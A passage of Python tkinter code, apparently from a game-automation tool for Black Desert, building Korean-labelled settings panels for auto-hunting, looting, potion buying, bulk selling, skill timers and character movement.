combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초)"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'].trace(
'w', lambda *args: self.callback_loot_box_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '전투의 흔적(탐색 시간 0.5초)',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "▶ 인식 범위:"
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOLTIP_COMBAT_BOX_RANGE)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'].trace(
'w', lambda *args: self.callback_box_range_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range')
)
combobox_list = LYBBlackDesert.box_range_list
if lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'],
state = "readonly",
height = 10,
width = 7,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = " "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'].trace(
'w', lambda *args: self.callback_loot_chegwang_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '채광',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'].trace(
'w', lambda *args: self.callback_loot_chejip_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '채집',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'].trace(
'w', lambda *args: self.callback_loot_beolmok_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '벌목',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
# frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
# frame = ttk.Frame(frame_label)
# frame.pack(anchor=tkinter.W, padx=5, side=tkinter.LEFT)
# frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'].trace(
'w', lambda *args: self.callback_jeoljeon_mode_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '절전 모드',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
s = ttk.Style()
s.configure('red_label.TLabel', foreground='red')
label = ttk.Label(
master = frame,
text = "무게 경고가 ",
style = 'red_label.TLabel'
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'].trace(
'w', lambda *args: self.callback_muge_percentage_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'] = 70
combobox_list = LYBBlackDesert.muge_percentage_list
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "% 이상일 경우 마을 가기",
style = 'red_label.TLabel'
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'].trace(
'w', lambda *args: self.callback_search_complete_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '퀘스트 완료 위아래로 탐색하기',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_head, text='물약 구매')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'].trace(
    'w', lambda *args: self.callback_potion_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'] = False
check_box = ttk.Checkbutton(
    master = frame,
    text = '물약 구매하기',
    variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'],
    onvalue = True,
    offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "횟수:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'].trace(
    'w', lambda *args: self.callback_potion_set_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'] = 10
combobox_list = [10, 50, 100]
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'],
    state = "readonly",
    height = 10,
    width = 3,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "개씩"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'].trace(
    'w', lambda *args: self.callback_potion_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'] = 10
combobox_list = [str(i) for i in range(1, 100)]
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'],
    state = "readonly",
    height = 10,
    width = 3,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "회"
)
label.pack(side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "물약 종류:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'].trace(
    'w', lambda *args: self.callback_potion_thing_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing')
)
combobox_list = LYBBlackDesert.potion_list
if lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'] = combobox_list[1]
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'],
    state = "readonly",
    height = 10,
    width = 5,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = " "
)
label.pack(side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "무게가 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'].trace(
    'w', lambda *args: self.callback_potion_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'] = 70
combobox_list = [str(i) for i in range(1, 100)]
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'],
    state = "readonly",
    height = 10,
    width = 5,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "% 이상이면 구매 중지"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_head, text='일괄 판매')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'].trace(
    'w', lambda *args: self.callback_sell_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'] = False
check_box = ttk.Checkbutton(
    master = frame,
    text = '일괄 판매 하기',
    variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'],
    onvalue = True,
    offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "품목분류: "
)
label.pack(side=tkinter.LEFT)
for i, each_pummok in enumerate(LYBBlackDesert.sell_pummok_list):
    key = lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + str(i)
    self.option_dic[key] = tkinter.BooleanVar(frame)
    # Dispatch to the matching callback_sell_pummok_<i>_booleanvar; indices
    # without a callback are skipped, matching the original if/elif chain.
    callback = getattr(self, 'callback_sell_pummok_%d_booleanvar' % i, None)
    if callback is not None:
        self.option_dic[key].trace(
            'w', lambda *args, key=key, callback=callback: callback(args, key)
        )
    if key not in self.configure.common_config[self.game_name]:
        self.configure.common_config[self.game_name][key] = False
    check_box = ttk.Checkbutton(
        master = frame,
        text = self.get_item_rank_text(each_pummok),
        variable = self.option_dic[key],
        onvalue = True,
        offvalue = False
    )
    check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "등급분류: "
)
label.pack(side=tkinter.LEFT)
for i, each_rank in enumerate(LYBBlackDesert.item_rank_list):
    key = lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + str(i)
    self.option_dic[key] = tkinter.BooleanVar(frame)
    # Same dispatch pattern as above for callback_sell_item_rank_<i>_booleanvar.
    callback = getattr(self, 'callback_sell_item_rank_%d_booleanvar' % i, None)
    if callback is not None:
        self.option_dic[key].trace(
            'w', lambda *args, key=key, callback=callback: callback(args, key)
        )
    if key not in self.configure.common_config[self.game_name]:
        self.configure.common_config[self.game_name][key] = False
    s = ttk.Style()
    s.configure(each_rank + '.TCheckbutton', foreground=LYBBlackDesert.item_rank_color_list[i])
    check_box = ttk.Checkbutton(
        master = frame,
        text = self.get_item_rank_text(each_rank),
        variable = self.option_dic[key],
        style = each_rank + '.TCheckbutton',
        onvalue = True,
        offvalue = False
    )
    check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'].trace(
    'w', lambda *args: self.callback_sell_jamjeryoek_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'] = False
s = ttk.Style()
s.configure('sell_jamjeryoek.TCheckbutton', foreground='#0367db')
check_box = ttk.Checkbutton(
    master = frame,
    text = '잠재력 돌파, 수정 장착된 장비 포함',
    variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'],
    style = 'sell_jamjeryoek.TCheckbutton',
    onvalue = True,
    offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# |                                         |
# |               Auto Hunt 2               |
# |                                         |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['hunt2_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='자동 사냥 시작 행동 설정')
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'].trace(
    'w', lambda *args: self.callback_hunt_quest_click_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'] = 0
frame = ttk.Frame(frame_label)
select_quest_location_list = [
    ('아무 행동도 하지 않기', 0),
    ('퀘스트 슬롯 1 번 클릭', 1),
    ('퀘스트 슬롯 2 번 클릭', 2),
    ('퀘스트 슬롯 3 번 클릭', 3),
    ('퀘스트 슬롯 4 번 클릭', 4),
]
for text, mode in select_quest_location_list:
    radio_button = ttk.Radiobutton(
        master = frame,
        text = text,
        variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'],
        value = mode
    )
    radio_button.pack()
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_label)
select_quest_location_list = [
    ('1 번 위치로 자동 이동', 5),
    ('2 번 위치로 자동 이동', 6),
    ('3 번 위치로 자동 이동', 7),
]
for text, mode in select_quest_location_list:
    radio_button = ttk.Radiobutton(
        master = frame,
        text = text,
        variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'quest_click'],
        value = mode
    )
    radio_button.pack()
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='흑정령 스킬')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'].trace(
    'w', lambda *args: self.callback_jadong_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean')
)
if lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'] = True
check_box = ttk.Checkbutton(
    master = frame,
    text = '흑정령 스킬을 사용합니다',
    variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + 'use_boolean'],
    onvalue = True,
    offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
for i, each_skill in enumerate(LYBBlackDesert.ddolmani_skill_list):
    frame = ttk.Frame(frame_label)
    skill_name = self.preformat_cjk(each_skill, 18)
    label = ttk.Label(
        master = frame,
        text = skill_name + ':'
    )
    label.pack(side=tkinter.LEFT)
    key = lybconstant.LYB_DO_STRING_BD_DDOLMANI_SKILL + str(i)
    self.option_dic[key] = tkinter.StringVar(frame)
    # Dispatch to callback_ddolmani_skill_<i>_stringvar; indices without a
    # callback are skipped, matching the original if/elif chain.
    callback = getattr(self, 'callback_ddolmani_skill_%d_stringvar' % i, None)
    if callback is not None:
        self.option_dic[key].trace(
            'w', lambda *args, key=key, callback=callback: callback(args, key)
        )
    combobox_list = [str(j) for j in range(0, 300, 5)]
    if key not in self.configure.common_config[self.game_name]:
        self.configure.common_config[self.game_name][key] = 90
    combobox = ttk.Combobox(
        master = frame,
        values = combobox_list,
        textvariable = self.option_dic[key],
        state = "readonly",
        height = 10,
        width = 3,
        font = lybconstant.LYB_FONT
    )
    combobox.set(self.configure.common_config[self.game_name][key])
    combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
    label = ttk.Label(
        master = frame,
        text = "초"
    )
    label.pack(side=tkinter.LEFT)
    frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.NW)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# |                                         |
# |              Work Settings              |
# |                                         |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='메인 퀘스트')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'].trace(
    'w', lambda *args: self.callback_jadong_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'] = False
check_box = ttk.Checkbutton(
    master = frame,
    text = '메인 퀘스트 진행 중에 전투 태세를 [자동]으로 강제 유지합니다',
    variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'jadong_boolean'],
    onvalue = True,
    offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='캐릭터 변경')
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "접속 캐릭터 슬롯 번호(맨 위가 1번):"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'].trace(
    'w', lambda *args: self.callback_chracter_change_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change')
)
combobox_list = [str(i) for i in range(1, 8)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'] = 1
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'],
    state = "readonly",
    height = 10,
    width = 3,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'chracter_change'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "번"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='마우스 클릭')
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "X 좌표:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'].trace(
    'w', lambda *args: self.callback_location_x_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'location_x')
)
combobox_list = [str(i) for i in range(1, 640)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'location_x' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'] = 320
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'],
    state = "readonly",
    height = 10,
    width = 5,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_x'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = " "
)
label.pack(side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = "Y 좌표:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'].trace(
    'w', lambda *args: self.callback_location_y_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'location_y')
)
combobox_list = [str(i) for i in range(1, 360)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'location_y' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'] = 100
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'],
    state = "readonly",
    height = 10,
    width = 5,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'location_y'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = " "
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='캐릭터 이동')
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "방향: "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'].trace(
    'w', lambda *args: self.callback_character_move_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'character_move')
)
combobox_list = LYBBlackDesert.character_move_list
if lybconstant.LYB_DO_STRING_BD_WORK + 'character_move' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'] = combobox_list[0]
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
    textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'],
    # justify = tkinter.CENTER,
    state = "readonly",
    height = 10,
    width = 2,
    font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
    master = frame,
    text = " "
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
    master = frame,
    text = "이동 시간: "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'].trace(
    'w', lambda *args: self.callback_character_move_time_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time')
)
combobox_list = [str(i) for i in range(0, 361)]
if lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'character_move_time'] = 0
combobox = ttk.Combobox(
    master = frame,
    values = combobox_list,
